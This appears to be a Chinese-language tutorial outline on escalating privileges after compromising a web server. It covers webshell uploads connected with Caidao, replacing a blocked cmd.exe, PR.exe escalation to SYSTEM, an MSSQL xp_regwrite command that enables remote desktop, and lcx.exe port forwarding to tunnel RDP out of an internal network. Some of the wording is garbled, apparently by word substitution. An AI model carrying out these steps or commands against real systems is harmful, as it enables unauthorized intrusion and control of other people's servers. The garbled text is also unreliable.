文章目录
[+]
---- 网易云热评
一、一样平常脚本所处的权限
1、asp/php 匿名权限
(图片来自网络侵删)
2、aspx user权限
3、jsp 系统权限
二、不同脚本,权限也不同
1、上传普通一句话木马,然后用菜刀连接
2、进入终端,输入命令
3、我们上传一个大马,访问
4、输入命令,可以正常实行
三、cmd无法实行
1、上传一个大马,访问
2、进入cmd命令界面,创造不能实行
3、找一个可读写目录,上传本地的cmd.exe
4、把路径修正为我们上传的路径,实行命令
四、PR提权
一、实行whoami获取权限
二、上传pr.exe,重新获取权限,直接便是system权限
五、MSSQL提权
1、打开sqltools,输入ip、端口、用户名、密码、数据库名,然后点击连接,提示连接成功
2、dos命令可以成功实行
3、连接3389提示缺点
4、实行下面命令,打开3389
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
5、连续连接3389端口
内网
六、端口转发
1、将lcx.exe上传到做事器,运行
lcx.exe -slave 192.168.171.128(外网) 2222 127.0.0.1(内网) 3389
2、在本地运行
lcx.exe -listen 1111 2222
3、打开远程桌面连接,输入127.0.0.1:2222,成功连接
禁止造孽,后果自大
欢迎关注公众号:web安全工具库
